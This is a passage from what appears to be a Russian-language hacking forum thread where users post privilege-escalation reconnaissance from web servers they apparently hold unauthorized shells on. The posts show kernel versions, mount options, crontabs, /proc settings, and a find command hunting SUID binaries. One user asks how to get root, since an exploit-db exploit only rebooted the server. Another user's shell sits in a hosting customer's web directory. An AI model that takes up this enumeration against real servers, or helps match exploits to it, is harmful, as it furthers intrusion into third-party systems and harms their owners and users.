    lrwxrwxrwx. 1 root root 33 2015-08-22 10:48:32.227268901 -0700 libiptc.so.0 -> /etc/alternatives/libiptc0.x86_64
    lrwxrwxrwx. 1 root root 35 2015-08-22 10:48:32.227268901 -0700 libiptc.so.0.0.0 -> /etc/alternatives/libiptc000.x86_64
    -rwxr-xr-x. 1 root root 3680 2015-07-23 19:10:21.000000000 -0700 libiptc.so.0.0.0-1.4.7
    lrwxrwxrwx. 1 root root 22 2015-08-22 10:45:35.223119418 -0700 libiptc.so.0-1.4.7 -> libiptc.so.0.0.0-1.4.7
    -rwxr-xr-x. 1 root root 34816 2015-07-23 15:57:31.000000000 -0700 libiw.so.29
    lrwxrwxrwx. 1 root root 18 2015-08-22 10:44:59.767685094 -0700 libjson-c.so.2 -> libjson-c.so.2.0.1
    -rwxr-xr-x. 1 root root 127147 2015-07-23 16:05:56.000000000 -0700 libjson-c.so.2.0.1
    lrwxrwxrwx. 1 root root 16 2015-08-22 10:44:59.777684935 -0700 libjson.so.0 -> libjson.so.0.1.0
    -rwxr-xr-x. 1 root root 6095 2015-07-23 16:05:56.000000000 -0700 libjson.so.0.1.0
    lrwxrwxrwx. 1 root root 18 2015-08-22 10:44:58.029712823 -0700 libk5crypto.so.3 -> libk5crypto.so.3.1
    -rwxr-xr-x. 1 root root 177520 2015-07-23 20:28:26.000000000 -0700 libk5crypto.so.3.1
    lrwxrwxrwx. 1 root root 18 2014-12-27 14:27:22.337000141 -0800 libkeyutils.so.1 -> libkeyutils.so.1.3
    -rwxr-xr-x. 1 root root 12592 2014-10-15 04:08:05.000000000 -0700 libkeyutils.so.1.3
    lrwxrwxrwx. 1 root root 14 2015-08-22 10:44:58.043712599 -0700 libkrb5.so.3 -> libkrb5.so.3.3
    -rwxr-xr-x. 1 root root 948840 2015-07-23 20:28:26.000000000 -0700 libkrb5.so.3.3
    lrwxrwxrwx. 1 root root 21 2015-08-22 10:44:58.107711579 -0700 libkrb5support.so.0 -> libkrb5support.so.0.1
    -rwxr-xr-x. 1 root root 46368 2015-07-23 20:28:26.000000000 -0700 libkrb5support.so.0.1
    lrwxrwxrwx. 1 root root 21 2015-12-12 10:46:48.948468621 -0800 liblber-2.4.so.2 -> liblber-2.4.so.2.10.3
    -rwxr-xr-x. 1 root root 63336 2015-11-10 01:44:04.000000000 -0800 liblber-2.4.so.2.10.3
    lrwxrwxrwx. 1 root root 21 2015-12-12 10:46:48.956468468 -0800 libldap-2.4.so.2 -> libldap-2.4.so.2.10.3
    -rwxr-xr-x. 1 root root 329728 2015-11-10 01:44:04.000000000 -0800 libldap-2.4.so.2.10.3
    lrwxrwxrwx. 1 root root 23 2015-12-12 10:46:49.002467591 -0800 libldap_r-2.4.so.2 -> libldap_r-2.4.so.2.10.3
    -rwxr-xr-x. 1 root root 351952 2015-11-10 01:44:04.000000000 -0800 libldap_r-2.4.so.2.10.3
    lrwxrwxrwx. 1 root root 21 2015-12-12 10:46:49.026467132 -0800 libldif-2.4.so.2 -> libldif-2.4.so.2.10.3
    -rwxr-xr-x. 1 root root 5960 2015-11-10 01:44:04.000000000 -0800 libldif-2.4.so.2.10.3
    -rwxr-xr-x. 1 root root 951136 2015-12-15 06:49:46.000000000 -0800 liblvm2app.so.2.2
    -rwxr-xr-x. 1 root root 1308112 2015-12-15 06:49:47.000000000 -0800 liblvm2cmd.so.2.02
    -rwxr-xr-x. 1 root root 599392 2016-02-16 10:38:00.000000000 -0800 libm-2.12.so
    lrwxrwxrwx. 1 root root 17 2014-12-27 14:27:45.357000141 -0800 libmount.so.1 -> libmount.so.1.1.0
    -rwxr-xr-x. 1 root root 68304 2014-10-15 03:38:28.000000000 -0700 libmount.so.1.1.0
    lrwxrwxrwx. 1 root root 20 2015-08-22 10:45:40.612033441 -0700 libmpathpersist.so -> libmpathpersist.so.0
    -rwxr-xr-x. 1 root root 34784 2015-07-23 17:54:22.000000000 -0700 libmpathpersist.so.0
    lrwxrwxrwx. 1 root root 12 2016-02-29 13:36:01.906966377 -0800 libm.so.6 -> libm-2.12.so
    -rwxr-xr-x. 1 root root 296328 2015-07-23 17:54:22.000000000 -0700 libmultipath.so
    lrwxrwxrwx. 1 root root 17 2015-08-22 10:44:55.757749071 -0700 libncurses.so.5 -> libncurses.so.5.7
    -rwxr-xr-x. 1 root root 142224 2015-03-16 01:54:00.000000000 -0700 libncurses.so.5.7
    lrwxrwxrwx. 1 root root 18 2015-08-22 10:44:55.770748864 -0700 libncursesw.so.5 -> libncursesw.so.5.7
    -rwxr-xr-x. 1 root root 191816 2015-03-16 01:54:00.000000000 -0700 libncursesw.so.5.7
    lrwxrwxrwx. 1 root root 20 2014-12-27 14:20:49.869000140 -0800 libnih-dbus.so.1 -> libnih-dbus.so.1.0.0
    -rwxr-xr-x. 1 root root 39896 2011-12-07 09:40:52.000000000 -0800 libnih-dbus.so.1.0.0
    lrwxrwxrwx. 1 root root 15 2014-12-27 14:20:49.871000140 -0800 libnih.so.1 -> libnih.so.1.0.0
    -rwxr-xr-x. 1 root root 101920 2011-12-07 09:40:52.000000000 -0800 libnih.so.1.0.0
    lrwxrwxrwx. 1 root root 14 2014-12-27 14:27:11.562000140 -0800 libnl.so.1 -> libnl.so.1.1.4
    -rwxr-xr-x. 1 root root 339816 2013-11-22 03:27:57.000000000 -0800 libnl.so.1.1.4
    -rwxr-xr-x. 1 root root 116368 2016-02-16 10:38:01.000000000 -0800 libnsl-2.12.so
    lrwxrwxrwx. 1 root root 14 2016-02-29 13:36:01.916966192 -0800 libnsl.so.1 -> libnsl-2.12.so
    -rwxr-xr-x. 1 root root 247160 2015-11-03 23:23:12.000000000 -0800 libnspr4.so
    -rwxr-xr-x. 1 root root 42808 2016-02-16 10:38:00.000000000 -0800 libnss_compat-2.12.so
    lrwxrwxrwx. 1 root root 21 2016-02-29 13:36:01.919966137 -0800 libnss_compat.so.2 -> libnss_compat-2.12.so
    -rwxr-xr-x. 1 root root 27424 2016-02-16 10:38:00.000000000 -0800 libnss_dns-2.12.so
    lrwxrwxrwx. 1 root root 18 2016-02-29 13:36:01.922966082 -0800 libnss_dns.so.2 -> libnss_dns-2.12.so
    -rwxr-xr-x. 1 root root 65928 2016-02-16 10:38:00.000000000 -0800 libnss_files-2.12.so
    lrwxrwxrwx. 1 root root 20 2016-02-29 13:36:01.927965989 -0800 libnss_files.so.2 -> libnss_files-2.12.so
    -rwxr-xr-x. 1 root root 24152 2016-02-16 10:37:59.000000000 -0800 libnss_hesiod-2.12.so
    lrwxrwxrwx. 1 root root 21 2016-02-29 13:36:01.929965953 -0800 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
    -rwxr-xr-x. 1 root root 52560 2016-02-16 10:37:59.000000000 -0800 libnss_nis-2.12.so
    -rwxr-xr-x. 1 root root 61712 2016-02-16 10:37:59.000000000 -0800 libnss_nisplus-2.12.so
    lrwxrwxrwx. 1 root root 22 2016-02-29 13:36:01.939965767 -0800 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
    lrwxrwxrwx. 1 root root 18 2016-02-29 13:36:01.934965861 -0800 libnss_nis.so.2 -> libnss_nis-2.12.so
    lrwxrwxrwx. 1 root root 17 2015-08-22 10:44:56.826732016 -0700 libpamc.so.0 -> libpamc.so.0.82.1
    -rwxr-xr-x. 1 root root 14528 2015-08-18 07:26:42.000000000 -0700 libpamc.so.0.82.1
    lrwxrwxrwx. 1 root root 21 2015-08-22 10:44:56.824732048 -0700 libpam_misc.so.0 -> libpam_misc.so.0.82.0
    -rwxr-xr-x. 1 root root 17248 2015-08-18 07:26:42.000000000 -0700 libpam_misc.so.0.82.0
    lrwxrwxrwx. 1 root root 16 2015-08-22 10:44:56.819732128 -0700 libpam.so.0 -> libpam.so.0.82.2
    -rwxr-xr-x. 1 root root 58480 2015-08-18 07:26:42.000000000 -0700 libpam.so.0.82.2
    lrwxrwxrwx. 1 root root 22 2015-08-22 10:45:40.285038658 -0700 libparted-2.1.so.0 -> libparted-2.1.so.0.0.0
    -rwxr-xr-x. 1 root root 504712 2015-07-23 18:00:38.000000000 -0700 libparted-2.1.so.0.0.0
    lrwxrwxrwx. 1 root root 16 2014-12-27 14:27:20.632000141 -0800 libpci.so.3 -> libpci.so.3.1.10
    -rwxr-xr-x. 1 root root 51472 2014-08-05 04:06:35.000000000 -0700 libpci.so.3.1.10
    lrwxrwxrwx. 1 root root 16 2015-08-22 10:45:03.905619075 -0700 libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x. 1 root root 185464 2015-07-23 15:46:06.000000000 -0700 libpcre.so.0.0.1
    -rwxr-xr-x. 1 root root 21288 2015-11-03 23:23:12.000000000 -0800 libplc4.so
    -rwxr-xr-x. 1 root root 17128 2015-11-03 23:23:12.000000000 -0800 libplds4.so
    lrwxrwxrwx. 1 root root 15 2014-12-27 14:27:47.400000140 -0800 libply.so.2 -> libply.so.2.0.0
    -rwxr-xr-x. 1 root root 92288 2014-08-11 10:59:59.000000000 -0700 libply.so.2.0.0
    lrwxrwxrwx. 1 root root 27 2014-12-27 14:27:47.395000140 -0800 libply-splash-core.so.2 -> libply-splash-core.so.2.0.0
    -rwxr-xr-x. 1 root root 72896 2014-08-11 10:59:59.000000000 -0700 libply-splash-core.so.2.0.0
    lrwxrwxrwx. 1 root root 16 2014-12-27 14:20:24.104000141 -0800 libpopt.so.0 -> libpopt.so.0.0.0
    -rwxr-xr-x. 1 root root 38808 2010-08-20 22:30:58.000000000 -0700 libpopt.so.0.0.0
    -rwxr-xr-x. 1 root root 65640 2015-12-15 06:59:43.000000000 -0800 libproc-3.2.8.so
    -rwxr-xr-x. 1 root root 145936 2016-02-16 10:38:00.000000000 -0800 libpthread-2.12.so
    lrwxrwxrwx. 1 root root 18 2016-02-29 13:36:01.949965582 -0800 libpthread.so.0 -> libpthread-2.12.so
    lrwxrwxrwx. 1 root root 18 2014-12-27 14:20:26.028000141 -0800 libreadline.so.6 -> libreadline.so.6.0
    -rwxr-xr-x. 1 root root 272008 2012-06-21 23:54:32.000000000 -0700 libreadline.so.6.0
    -rwxr-xr-x. 1 root root 113952 2016-02-16 10:38:00.000000000 -0800 libresolv-2.12.so
    lrwxrwxrwx. 1 root root 17 2016-02-29 13:36:01.958965418 -0800 libresolv.so.2 -> libresolv-2.12.so
    -rwxr-xr-x. 1 root root 47168 2016-02-16 10:37:59.000000000 -0800 librt-2.12.so
    lrwxrwxrwx. 1 root root 13 2016-02-29 13:36:01.962965342 -0800 librt.so.1 -> librt-2.12.so
    -rwxr-xr-x. 1 root root 21928 2016-02-16 10:38:00.000000000 -0800 libSegFault.so
    -rwxr-xr-x. 1 root root 124624 2014-10-15 04:42:33.000000000 -0700 libselinux.so.1
    -rwxr-xr-x. 1 root root 201952 2015-07-23 18:38:39.000000000 -0700 libsemanage.so.1
    -rwxr-xr-x. 1 root root 251112 2011-12-07 10:01:08.000000000 -0800 libsepol.so.1
    lrwxrwxrwx. 1 root root 12 2015-08-22 10:45:15.196438935 -0700 libss.so.2 -> libss.so.2.0
    -rwxr-xr-x. 1 root root 29656 2015-07-24 03:33:24.000000000 -0700 libss.so.2.0
    -rwxr-xr-x. 1 root root 34008 2016-02-16 10:38:00.000000000 -0800 libthread_db-1.0.so
    lrwxrwxrwx. 1 root root 19 2016-02-29 13:36:01.965965288 -0800 libthread_db.so.1 -> libthread_db-1.0.so
    lrwxrwxrwx. 1 root root 15 2015-08-22 10:44:55.782748672 -0700 libtinfo.so.5 -> libtinfo.so.5.7
    -rwxr-xr-x. 1 root root 134792 2015-03-16 01:54:00.000000000 -0700 libtinfo.so.5.7
    lrwxrwxrwx. 1 root root 16 2015-12-25 12:47:16.986240681 -0800 libudev.so.0 -> libudev.so.0.5.1
    -rwxr-xr-x. 1 root root 57552 2015-12-16 09:38:27.000000000 -0800 libudev.so.0.5.1
    -rwxr-xr-x. 1 root root 17520 2016-02-16 10:37:59.000000000 -0800 libutil-2.12.so
    lrwxrwxrwx. 1 root root 15 2016-02-29 13:36:01.966965270 -0800 libutil.so.1 -> libutil-2.12.so
    lrwxrwxrwx. 1 root root 16 2014-12-27 14:27:11.490000141 -0800 libuuid.so.1 -> libuuid.so.1.3.0
    -rwxr-xr-x. 1 root root 18936 2014-10-15 03:38:28.000000000 -0700 libuuid.so.1.3.0
    lrwxrwxrwx. 1 root root 16 2014-12-27 14:23:37.508000140 -0800 libwrap.so -> libwrap.so.0.7.6
    lrwxrwxrwx. 1 root root 16 2014-12-27 14:20:26.747000140 -0800 libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x. 1 root root 40792 2011-12-07 09:45:47.000000000 -0800 libwrap.so.0.7.6
    lrwxrwxrwx. 1 root root 36 2015-08-22 10:48:32.227268901 -0700 libxtables.so.4 -> /etc/alternatives/libxtables4.x86_64
    lrwxrwxrwx. 1 root root 38 2015-08-22 10:48:32.227268901 -0700 libxtables.so.4.0.0 -> /etc/alternatives/libxtables400.x86_64
    -rwxr-xr-x. 1 root root 34616 2015-07-23 19:10:22.000000000 -0700 libxtables.so.4.0.0-1.4.7
    lrwxrwxrwx. 1 root root 25 2015-08-22 10:45:35.225119387 -0700 libxtables.so.4-1.4.7 -> libxtables.so.4.0.0-1.4.7
    lrwxrwxrwx. 1 root root 13 2014-12-27 14:20:22.677000141 -0800 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x. 1 root root 91096 2013-02-21 15:02:16.000000000 -0800 libz.so.1.2.3
    drwxr-xr-x. 2 root root 4096 2015-08-22 10:45:40.680032356 -0700 multipath
    drwxr-xr-x. 2 root root 4096 2014-12-27 14:22:12.213000141 -0800 rsyslog
    drwxr-xr-x. 2 root root 4096 2016-02-29 13:36:01.971965177 -0800 rtkaio
    drwxr-xr-x. 3 root root 4096 2016-01-25 23:23:33.590240115 -0800 security
    dr-xr-xr-x. 2 root root 4096 2011-09-23 04:50:20.000000000 -0700 tls
    drwxr-xr-x. 2 root root 4096 2015-08-22 10:46:43.864023466 -0700 xtables
    drwxr-xr-x. 2 root root 4096 2014-12-27 14:22:18.663000140 -0800 xtables-1.4.7
    $ ls -la --full-time /lib
    total 48
    dr-xr-xr-x. 10 root root 4096 2015-08-22 10:45:15.646431756 -0700 .
    dr-xr-xr-x. 25 root root 4096 2016-04-24 21:43:01.567027756 -0700 ..
    drwxr-xr-x. 3 root root 4096 2015-01-26 08:22:51.000000000 -0800 alsa
    lrwxrwxrwx. 1 root root 14 2015-08-22 10:45:15.639431868 -0700 cpp -> ../usr/bin/cpp
    drwxr-xr-x. 3 root root 4096 2014-12-27 14:28:06.159000141 -0800 crda
    drwxr-xr-x. 44 root root 12288 2016-02-29 13:36:41.338238545 -0800 firmware
    drwxr-xr-x. 6 root root 4096 2014-12-27 14:22:21.475000141 -0800 kbd
    dr-xr-xr-x. 7 root root 4096 2016-03-18 19:55:04.514495053 -0700 modules
    drwxr-xr-x. 2 root root 4096 2015-08-18 07:26:37.000000000 -0700 security
    drwxr-xr-x. 6 root root 4096 2015-03-16 01:53:51.000000000 -0700 terminfo
    drwxr-xr-x. 5 root root 4096 2016-03-01 03:15:57.854770267 -0800 udev
    $ mount
    /dev/sda5 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw,rootcontext="system_u:eek:bject_r:tmpfs_t:s0")
    /dev/sda1 on /boot type ext3 (rw)
    /dev/sda2 on /tmp type ext3 (rw,noexec,nosuid)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /tmp on /var/tmp type none (rw,noexec,nosuid,bind)
    $ df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/sda5 191G 84G 98G 47% /
    tmpfs 8.1G 0 8.1G 0% /dev/shm
    /dev/sda1 504M 184M 295M 39% /boot
    /dev/sda2 2.0G 83M 1.8G 5% /tmp


    $ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # For details see man 4 crontabs

    # Example of job definition:
    # .---------------- minute (0 - 59)
    # | .------------- hour (0 - 23)
    # | | .---------- day of month (1 - 31)
    # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
    # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # | | | | |
    # * * * * * user-name command to be executed

    $ cat /proc/version
    Linux version 2.6.32-573.12.1.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Dec 15 21:19:08 UTC 2015
    $ cat /proc/sys/vm/mmap_min_addr
    4096
    $ pwd
    /tmp
    $ ls -la /usr/bin/staprun
    ---s--x---. 1 root stapusr 183072 Jul 23 2015 /usr/bin/staprun


    $ ls -la /etc/cron.d
    total 48
    drwxr-xr-x. 2 root root 4096 Dec 12 10:46 .
    drwxr-xr-x. 105 root root 12288 Apr 24 23:26 ..
    -rw-r--r--. 1 root root 113 Nov 10 02:14 0hourly
    -rw-r--r--. 1 root root 14 Feb 1 2013 csf-cron
    -rw-------. 1 root root 48 Dec 27 2014 csf_update
    -rw-------. 1 root root 69 Jan 13 2015 installatron
    -rw-r--r--. 1 root root 70 Feb 1 2013 lfd-cron
    -rw-r--r--. 1 root root 137 Jul 31 2015 mscpanel.sh
    -rw-------. 1 root root 108 May 20 2015 raid-check
    -rw-------. 1 root root 235 Oct 16 2014 sysstat

    $ ls -la /etc/cron.hourly
    total 20
    drwxr-xr-x. 2 root root 4096 Dec 12 10:46 .
    drwxr-xr-x. 105 root root 12288 Apr 24 23:26 ..
    -rwxr-xr-x. 1 root root 409 Nov 10 02:14 0anacron
    lrwxrwxrwx. 1 root root 42 Dec 27 2014 update_virus_scanners -> /usr/mailscanner/bin/update_virus_scanners

    $ ls -la /etc/cron.monthly
    total 20
    drwxr-xr-x. 2 root root 4096 Dec 27 2014 .
    drwxr-xr-x. 105 root root 12288 Apr 24 23:30 ..
    -rwxr-xr-x. 1 root root 111 Nov 23 2013 readahead-monthly.cron

    $ ls -la /etc/cron.weekly
    total 24
    drwxr-xr-x. 2 root root 4096 Aug 23 2015 .
    drwxr-xr-x. 105 root root 12288 Apr 24 23:30 ..
    -rwxr-x---. 1 root root 946 Aug 23 2015 clearcpremote.sh
    -rwx------. 1 root root 592 Aug 23 2015 updatecpremote.sh
     
    #618 semik, 25 Apr 2016
    Last edited: 25 Apr 2016
  19. EstGi

    EstGi New Member

    Joined:
    9 Sep 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Linux 2.6.26-2-amd64 #1 SMP Sun Mar 4 21:48:06 UTC 2012 x86_64 GNU/Linux
    ================================================ ls -la /boot ================================================
    total 9652
    drwxr-xr-x 3 root root 4096 Jun 13 2013 .
    drwxr-xr-x 23 root root 4096 Sep 14 06:39 ..
    -rw-r--r-- 1 root root 1227656 Mar 4 2012 System.map-2.6.26-2-amd64
    -rw-r--r-- 1 root root 85694 Mar 4 2012 config-2.6.26-2-amd64
    drwxr-xr-x 2 root root 4096 Jun 13 2013 grub
    -rw-r--r-- 1 root root 6771715 Jun 13 2013 initrd.img-2.6.26-2-amd64
    -rw-r--r-- 1 root root 1757072 Mar 4 2012 vmlinuz-2.6.26-2-amd64
    ================================================ cat /proc/version ================================================
    Linux version 2.6.26-2-amd64 (Debian 2.6.26-29) ([email protected]) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-25)) #1 SMP Sun Mar 4 21:48:06 UTC 2012
    ================================================ cat /etc/issue ================================================
    Debian GNU/Linux 5.0
    ============================================================================================================
    $sudo -V
    Sudo version 1.6.9p17
    ============================================================================================================
    $ ldd --version
    ldd (GNU libc) 2.7
    ============================================================================================================
    cat /proc/sys/kernel/randomize_va_space
    2
    ============================================================================================================

    Подскажите пожалуйста чем порутать, все вроде старое но не пробивает ((
    вот от этого https://www.exploit-db.com/exploits/34134/ сервер уходит в ребут
     
  20. PlataOPlomo

    PlataOPlomo New Member

    Joined:
    1 Sep 2016
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Добрый вечер!

    Буду признателен за подсказку.

    Code:
    sh-4.1$ uname -a
    uname -a
    Linux h1.ihc.ru 2.6.32-642.1.1.el6.x86_64 #1 SMP Tue May 31 21:57:07 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
    
    
    sh-4.1$ ls -la /boot
    ls -la /boot
    total 82360
    dr-xr-xr-x  4 root root     4096 Jun 20 15:46 .
    drwxr-xr-x 26 root root     4096 Jul  5 00:30 ..
    -rw-r--r--  1 root root      170 Mar  7  2012 .vmlinuz-2.6.32-220.7.1.el6.x86_64.hmac
    -rw-r--r--  1 root root      170 Jun  1 01:02 .vmlinuz-2.6.32-642.1.1.el6.x86_64.hmac
    -rw-r--r--  1 root root      165 May 20  2011 .vmlinuz-2.6.32-71.el6.x86_64.hmac
    -rw-r--r--  1 root root  2313972 Mar  7  2012 System.map-2.6.32-220.7.1.el6.x86_64
    -rw-r--r--  1 root root  2615135 Jun  1 01:02 System.map-2.6.32-642.1.1.el6.x86_64
    -rw-r--r--  1 root root  2226490 May 20  2011 System.map-2.6.32-71.el6.x86_64
    -rw-r--r--  1 root root   100947 Mar  7  2012 config-2.6.32-220.7.1.el6.x86_64
    -rw-r--r--  1 root root   108107 Jun  1 01:02 config-2.6.32-642.1.1.el6.x86_64
    -rw-r--r--  1 root root    97862 May 20  2011 config-2.6.32-71.el6.x86_64
    drwxr-xr-x  3 root root     4096 Dec  8  2011 efi
    drwxr-xr-x  2 root root     4096 Jun 21 11:14 grub
    -rw-r--r--  1 root root 15414292 Apr 17  2012 initramfs-2.6.32-220.7.1.el6.x86_64.img
    -rw-------  1 root root 22114675 Jun 20 15:42 initramfs-2.6.32-642.1.1.el6.x86_64.img
    -rw-r--r--  1 root root 13446144 Dec  8  2011 initramfs-2.6.32-71.el6.x86_64.img
    -rw-------  1 root root  4768542 Jun 20 15:41 initrd-2.6.32-220.7.1.el6.x86_64kdump.img
    -rw-------  1 root root  4876579 Jun 20 15:46 initrd-2.6.32-642.1.1.el6.x86_64kdump.img
    -rw-r--r--  1 root root  3643212 Apr 17  2012 initrd-2.6.32-71.el6.x86_64kdump.img
    -rw-r--r--  1 root root   171216 Mar  7  2012 symvers-2.6.32-220.7.1.el6.x86_64.gz
    -rw-r--r--  1 root root   215559 Jun  1 01:02 symvers-2.6.32-642.1.1.el6.x86_64.gz
    -rw-r--r--  1 root root   160542 May 20  2011 symvers-2.6.32-71.el6.x86_64.gz
    -rwxr-xr-x  1 root root  3941040 Mar  7  2012 vmlinuz-2.6.32-220.7.1.el6.x86_64
    -rwxr-xr-x  1 root root  4264432 Jun  1 01:02 vmlinuz-2.6.32-642.1.1.el6.x86_64
    -rwxr-xr-x  1 root root  3791040 May 20  2011 vmlinuz-2.6.32-71.el6.x86_64
    
    
    sh-4.1$ ls -la --full-time /lib
    ls -la --full-time /lib
    total 48
    dr-xr-xr-x 10 root root  4096 2016-08-02 16:19:19.410880280 +0300 .
    drwxr-xr-x 26 root root  4096 2016-07-05 00:30:41.385863698 +0300 ..
    drwxr-xr-x  3 root root  4096 2016-05-11 11:24:26.000000000 +0300 alsa
    lrwxrwxrwx  1 root root    14 2016-08-02 16:19:19.410880280 +0300 cpp -> ../usr/bin/cpp
    drwxr-xr-x  3 root root  4096 2016-06-20 14:40:03.502496274 +0300 crda
    drwxr-xr-x 46 root root 12288 2016-06-20 15:41:30.129591585 +0300 firmware
    drwxr-xr-x  6 root root  4096 2011-12-08 18:08:22.000000000 +0400 kbd
    dr-xr-xr-x  5 root root  4096 2016-06-20 14:40:09.462474436 +0300 modules
    drwxr-xr-x  2 root root  4096 2016-05-11 02:18:18.000000000 +0300 security
    drwxr-xr-x  6 root root  4096 2015-03-16 11:53:51.000000000 +0300 terminfo
    drwxr-xr-x  5 root root  4096 2016-08-18 04:07:48.429461162 +0300 udev
    
    
    sh-4.1$ mount
    mount
    /dev/sda1 on / type ext4 (rw,noatime)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda3 on /tmp type ext4 (rw,noexec,nosuid,nodev,noatime,data=writeback,barrier=0)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /dev/sda4 on /home type ext4 (rw,noatime,usrquota,barrier=0)
    
    
    sh-4.1$ df -h
    df -h
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/sda1        30G  6.8G   22G  25% /
    tmpfs            24G   80K   24G   1% /dev/shm
    /dev/sda3       2.0G  779M  1.1G  43% /tmp
    /dev/sda4       1.8T  434G  1.4T  25% /home
    
    
    sh-4.1$ cat /etc/issue
    cat /etc/issue
    CentOS release 6.8 (Final)
    Kernel \r on an \m
    
    
    sh-4.1$ cat /etc/crontab
    cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=cronlog
    HOME=/
    
    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    
    */5 * * * * root /usr/local/bin/passwd_change.sh >/dev/null 2>&1
    0 */3 * * * root /usr/local/bin/bbutemp.sh  >/dev/null 2>&1
    */10 * * * * root /usr/local/bin/move_nrpe.sh >/dev/null 2>&1
    */10 * * * * root /usr/bin/timeout 540 puppet agent --no-daemonize --onetime -l /var/log/puppet/agent.log --onetime --certname `hostname` --server puppet.ihc-ru.net >/dev/null 2>&1; rm -f /var/lib/puppet/state/agent_catalog_run.lock
    */30 * * * * root ( fail2ban-client reload WordPress; /sbin/iptables -F http ) >/dev/null 2>&1
    0 2 * * * root ( sqlite3 /var/lib/fail2ban/fail2ban.sqlite3 "DELETE FROM bans; VACUUM;"; /sbin/service fail2ban restart ) >/dev/null 2>&1
    */30 * * * * root /usr/local/bin/shape_shared.sh >/dev/null 2>&1
    0 2 * * 7 root [ `date "+\%d"` -lt 8 ] && root /usr/local/bin/autolearn.sh >/dev/null 2>&1
    30 22 * * * root /usr/local/bin/countfiles.sh >/dev/null 2>&1
    */3 * * * * root /usr/bin/killall -19 transmission-daemon deluge deluged mlnet rtorrent utserver deluge-web fmb qbittorrent minerd jhprimeminer bitcoind > /dev/null 2>&1
    40 17 * * * root /usr/local/bin/regkernelcare >/dev/null 2>&1
    0 3 * * 1 root /usr/local/bin/virusscan.pl >/dev/null 2>&1
    
    
    
    sh-4.1$ ls -la /etc/cron.d
    ls -la /etc/cron.d
    total 44
    drwxr-xr-x   2 root root  4096 Jun 20 16:19 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:45 ..
    -rw-r--r--   1 root root    67 Apr 28  2010 atop
    -rw-r--r--   1 root root    50 Jun 20 16:15 kcare-cron
    -rw-r--r--   1 root root   405 Jun 20 16:17 lsws
    -rw-r--r--   1 root root   232 Jun 20 16:19 puppet
    -rw-------   1 root root   108 Dec 11  2015 raid-check
    -rw-r--r--   1 root root   459 Dec  5  2013 sa-update
    -rw-------   1 root root   235 May 11 05:02 sysstat
    
    
    sh-4.1$ ls -la /etc/cron.hourly
    ls -la /etc/cron.hourly
    total 28
    drwxr-xr-x   2 root root  4096 Jun 20 16:19 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:45 ..
    -rwxr-xr-x   1 root root   195 Mar 20  2013 00awstats
    -rwx------   1 root root   611 Jun 20 16:17 ip6_check_count_rules.sh
    -rwx------   1 root root   899 Jun 20 16:16 rotate_acct.sh
    
    
    sh-4.1$ ls -la /etc/cron.monthly
    ls -la /etc/cron.monthly
    total 20
    drwxr-xr-x   2 root root  4096 Jun 20 15:41 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:49 ..
    -rwxr-xr-x   1 root root   111 Nov 23  2013 readahead-monthly.cron
    
    
    sh-4.1$ ls -la /etc/cron.weekly
    ls -la /etc/cron.weekly
    total 16
    drwxr-xr-x   2 root root  4096 Apr 17  2012 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:50 ..
    
    
    sh-4.1$ cat /proc/version
    cat /proc/version
    Linux version 2.6.32-642.1.1.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC) ) #1 SMP Tue May 31 21:57:07 UTC 2016
    
    
    sh-4.1$ cat /proc/sys/vm/mmap_min_addr
    cat /proc/sys/vm/mmap_min_addr
    4096
    
    
    sh-4.1$ pwd
    pwd
    /home/p2267/www/****.ru/content
    
    
    sh-4.1$ ls -la /usr/bin/staprun
    ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 183072 May 11 02:40 /usr/bin/staprun
    
    
    sh-4.1$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rwsr-x--- 1 root dbus 50552 Apr 22  2015 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 53472 May 11 01:58 /bin/umount
    -rwsr-xr-x 1 root root 77336 May 11 01:58 /bin/mount
    -rwsr-xr-x 1 root root 34904 May 11 11:59 /bin/su
    -rwsr-xr-x 1 root root 36488 May 10 21:32 /bin/ping6
    -rwsr-xr-x 1 root root 38264 May 10 21:32 /bin/ping
    -r-sr-xr-x 1 root root 19848 Jun 30  2015 /usr/local/lsws/bin/lscgid.5.0.1
    -r-sr-xr-x 1 root root 19848 May 26 16:56 /usr/local/lsws/bin/lscgid.5.0.17
